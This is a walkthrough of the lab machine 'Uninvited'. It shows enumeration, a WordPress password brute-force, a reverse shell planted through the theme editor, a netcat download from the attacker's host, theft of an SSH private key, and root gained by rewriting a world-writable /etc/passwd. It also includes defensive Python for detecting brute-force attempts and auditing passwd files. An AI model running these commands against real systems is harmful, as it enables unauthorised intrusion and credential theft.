
Uninvited is a machine from Vulnhub with a difficulty between intermediate and hard according to its creator. It consists of enumerating and brute-forcing WordPress to gain initial access; then, taking advantage of a backdoor, we escape the Docker container, and finally we abuse misconfigured file permissions to obtain root.
Enumeration
As this machine is from Vulnhub, we are going to perform a ping sweep to find which IP from our local network has been assigned to this box.
The simple bash script is the following:
#!/bin/bash
# Ping sweep: takes the first three octets of a /24 (e.g. 192.168.1) and
# prints every host that answers a single ICMP echo request.
if [ "$1" == "" ]
then
    echo "You forgot an IP address!"
    echo "Syntax: ./ip_scan.sh 192.168.1"
else
    for ip in `seq 1 254`; do
        # Each ping runs in the background so the whole /24 finishes quickly
        ping -c 1 "$1.$ip" | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
    done
    # Wait for the background pings before exiting
    wait
fi
Running it we find this machine's IP is 192.168.100.18:
noxious@kali:~/Desktop$ ./pingsweep.sh 192.168.100
192.168.100.8
192.168.100.10
192.168.100.14
192.168.100.1
192.168.100.18
Now we can run nmap to find which ports are open:
nmap -p- 192.168.100.18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 13:28 CEST
Nmap scan report for 192.168.100.18
Host is up (0.019s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE
80/tcp    open     http
7894/tcp  open     unknown
11566/tcp filtered unknown
60000/tcp open     unknown
And we run some default scripts on them:
nmap -sC -sV -p 7894,11566,60000 192.168.100.18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 14:00 CEST
Nmap scan report for 192.168.100.18
Host is up (0.052s latency).
PORT      STATE  SERVICE VERSION
7894/tcp  open   ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 af:d2:42:e4:31:ff:4f:fb:0b:de:18:e9:3f:c4:bc:42 (RSA)
|   256 97:56:47:40:ea:99:b2:a6:1a:a5:59:56:7e:2b:b4:a0 (ECDSA)
|_  256 b2:b1:67:44:75:f6:d8:32:a2:f2:ff:7f:09:a7:7d:53 (ED25519)
11566/tcp closed unknown
60000/tcp open   http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: UNINVITED
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Browsing to port 80 we find the following site:
Inspecting its source code we find a base64-encoded comment:
Next we decode it:
echo "WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=" | base64 -d
Yeah! I know it happens... I guess u might want to add this [fieldforce] to your hosts
So we add fieldforce to /etc/hosts and access it on port 60000:
Running gobuster to enumerate hidden directories we get /backdoor, which reveals the WordPress login page:
gobuster dir -u http://fieldforce:60000/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/wp-content (Status: 301)
/h (Status: 301)
/atom (Status: 200)
/rss2 (Status: 200)
/wp-includes (Status: 301)
/sa (Status: 301)
/rdf (Status: 200)
/sample (Status: 301)
/page1 (Status: 200)
/' (Status: 301)
/he (Status: 301)
/%20 (Status: 301)
/sam (Status: 301)
/hello (Status: 301)
/2020 (Status: 301)
/wp-admin (Status: 301)
/backdoor (Status: 302)
/0000 (Status: 301)
As the site is running WordPress, we can use cewl to create a custom wordlist and then brute-force this login page with wpscan:
cewl http://fieldforce:60000/ --with-numbers -d 2 -m 4 -w wordlist.txt
wpscan --url http://fieldforce:60000/ -P Desktop/wordlist.txt
[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - elliot / wh1ter0se
[SUCCESS] - Elliot / wh1ter0se
Trying Elliot / wh1ter0se Time: 00:00:35 <====================== > (1918 / 3836) 50.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: elliot, Password: wh1ter0se
| Username: Elliot, Password: wh1ter0se
Now, with this set of credentials, we can log in to the site:
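Detecting this kind of attack from the server side is the defender's counterpart to the wpscan run above. Below is an added Python example (not part of the original write-up) that scans Apache access-log lines for bursts of POST requests to xmlrpc.php from a single client; the log lines are constructed samples and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
# Apache combined log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not taken from the machine): a burst of POSTs to
# xmlrpc.php from one client, plus ordinary traffic from another.
SAMPLE_LOG = "\n".join(
    [f'192.168.100.10 - - [20/Sep/2020:14:05:{sec:02d} +0200] '
     '"POST /xmlrpc.php HTTP/1.1" 200 370 "-" "wpscan"' for sec in range(40)]
    + ['192.168.100.14 - - [20/Sep/2020:14:05:12 +0200] "GET /index.php HTTP/1.1" 200 12034 "-" "Mozilla/5.0"',
       '192.168.100.14 - - [20/Sep/2020:14:05:30 +0200] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Jetpack"']
)

def parse(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def xmlrpc_bursts(log_text, threshold=20, window_seconds=60):
    """Return {ip: peak_count} for clients that POST to xmlrpc.php more than
    `threshold` times inside any `window_seconds` sliding window.
    xmlrpc.php answers HTTP 200 for good and bad credentials alike, so the
    status code is no help; the per-client request rate is the signal."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0].endswith("/xmlrpc.php"):
            per_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until it spans <= window_seconds
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = max(flagged.get(ip, 0), end - start + 1)
    return flagged
```

Running `xmlrpc_bursts(SAMPLE_LOG)` flags only 192.168.100.10, with 40 POSTs inside the window; the single Jetpack POST from the other client stays below the threshold.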
Exploitation
We can get a reverse shell by going to the theme editor and editing a non-active theme, such as Twenty Nineteen, with the following PHP reverse shell.
Afterwards, we make that theme the active one and trigger the shell:
curl http://fieldforce:60000/404.php
Obtaining a reverse connection as www-data:
nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.100.10] from (UNKNOWN) [192.168.100.18] 45660
Linux f950b9c50e1d 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 GNU/Linux
14:18:10 up 17 min, 0 users, load average: 0.07, 0.06, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
After upgrading the shell, it seems that we are inside a Docker container. Then we discover a note that contains a hint:
www-data@f950b9c50e1d:/home/demodocker/.local$ cat note.txt
ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs
www-data@f950b9c50e1d:/home/demodocker/.local$ echo "ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs" | base64 -d
encoded twice LS0taXAtLS0vZnNvY2lldHkuZXhl
www-data@f950b9c50e1d:/home/demodocker/.local$ echo "LS0taXAtLS0vZnNvY2lldHkuZXhl" | base64 -d
---ip---/fsociety.exewww-data@f950b9c50e1d:/home/demodocker/.local$
We can download that file with wget:
wget 192.168.100.18/fsociety.exe
As it is an .exe file, we can use wine to execute it. The program asks for a set of credentials which, following the machine's theme, are trivial to guess:
root@kali:/home/noxious/Downloads# wine fsociety.exe
WELCOME TO BACKDOOR
-------------------
+++++++++++++++++++
===================
USERNAME : elliot
PASSWORD : mrrobot
===================
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
User has been identified, Welcome elliot
###############################################################
TH3 H!N7
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Do you know python-reverse-shell client/server socket program?
If IP_Address is 172.18.0.2, use port 9999
If IP_Address is 172.18.0.3, use port 8888
Remember 'PATIENCE' is the KEY
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Press Enter!
We check the IP and, as netcat is not on the machine, we upload it:
www-data@f950b9c50e1d:/tmp$ ifconfig | grep 172.18.0
inet 172.18.0.3 netmask 255.255.0.0 broadcast 172.18.255.255
www-data@f950b9c50e1d:/tmp$ which nc
www-data@f950b9c50e1d:/tmp$ wget http://192.168.100.10/nc
Then we can start our listener on port 8888, obtaining a connection:
www-data@f950b9c50e1d:/tmp$ ./nc -lvnp 8888
listening on [any] 8888 ...
connect to [172.18.0.3] from (UNKNOWN) [172.18.0.1] 59106
/home/docksec> id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)
The first flag can be read:
/home/docksec> ls
user1.txt
/home/docksec> cat user1.txt
[ASCII-art banner]
FLAG{DASDGFGPXLCKDEG5D7635CSDAFDIMMJDSUWEQDSADIG}
The session obtained closes when we run a cd command, so we aim to read the private SSH key in order to gain a more stable shell:
/home/docksec> cat .ssh/id_rsa
And we get a shell by logging in through SSH, which in this case is running on port 7894:
ssh docksec@192.168.100.18 -i id_rsa -p 7894
Privilege Escalation
Enumerating the machine, we see that we have write permission on /etc/passwd:
docksec@uninvited:~$ ls -la /etc/passwd
-rwxrwxrwx 1 777 root 1628 Sep 20 22:29 /etc/passwd
So we can just generate a new password hash with openssl and insert it into the root entry with a text editor such as nano:
openssl passwd noxious
EfsRhwv.xHlkw
docksec@uninvited:~$ cat /etc/passwd | head -n 1
root:EfsRhwv.xHlkw:0:0:root:/root:/bin/bash
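An audit for the misconfiguration abused here, added as an example and not part of the original write-up: it checks /etc/passwd-style content for inline password hashes, empty password fields and extra UID 0 accounts, and checks the file's mode and owner against the expected 0644/root. The sample passwd text is constructed; its root line reuses the modified entry shown above.

```python
import os
import stat
# Constructed sample in /etc/passwd format (not the machine's real file);
# the root line mirrors the modified entry shown above.
SAMPLE_PASSWD = """\
root:EfsRhwv.xHlkw:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
docksec:x:1001:1001::/home/docksec:/bin/bash
backup::34:34:backup:/var/backups:/usr/sbin/nologin
"""

def audit_passwd_entries(text):
    """Return (user, problem) pairs. 'x' means the hash lives in /etc/shadow
    (expected); any other unlocked value is an inline crypt hash that su/login
    will accept, and an empty field means no password is required at all."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((user, "empty password field"))
        elif pw not in ("x", "*", "!", "!!"):
            findings.append((user, "hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and user != "root":
            findings.append((user, "extra UID 0 account"))
    return findings

def audit_passwd_mode(mode, uid=0):
    """Findings for a st_mode/st_uid pair; /etc/passwd should be 0644, owned by root."""
    findings = []
    if uid != 0:
        findings.append("not owned by root")
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings

def audit_passwd_file(path="/etc/passwd"):
    """Audit a real file: permission/owner findings followed by per-entry findings."""
    st = os.stat(path)
    with open(path) as fh:
        entries = audit_passwd_entries(fh.read())
    return audit_passwd_mode(st.st_mode, st.st_uid) + [f"{u}: {p}" for u, p in entries]
```

Calling `audit_passwd_mode(0o100777, 777)` reproduces the findings for the mode and owner shown in the ls -la output above, and `audit_passwd_entries(SAMPLE_PASSWD)` flags the root hash and the empty backup password while leaving docksec clean.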
Finally we can access root using our password and obtain the third flag:
docksec@uninvited:~$ su root
Password:
root@uninvited:/home/docksec# cat /root/root.txt
[ASCII-art banner]
FLAG{58DSFJ74RFWESD8J2LKJGHJ87ER4QREWRFLMSTDCMGKAASD}
We still have the Docker flag left, which can be obtained now that we have full privileges.
First we list the Docker containers:
root@uninvited:~# docker container list
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f950b9c50e1d wordpress:latest "docker-entrypoint.s…" 7 weeks ago Up 29 minutes 0.0.0.0:60000->80/tcp wordpress_wordpress_1_dd9b95034d3d
982523fa9f5f mysql:5.7 "docker-entrypoint.s…" 7 weeks ago Up 29 minutes 3306/tcp, 33060/tcp wordpress_db_1_9676244bc9b2
Now we can run a command inside the WordPress container and cat the flag:
root@uninvited:~# docker exec wordpress_wordpress_1_dd9b95034d3d cat /home/demodocker/user2.txt
[ASCII-art banner] RIGHT ????????
FLAG{FPDSNRWEBT513SDASDHTYHMDSARTSIJO32SDFH}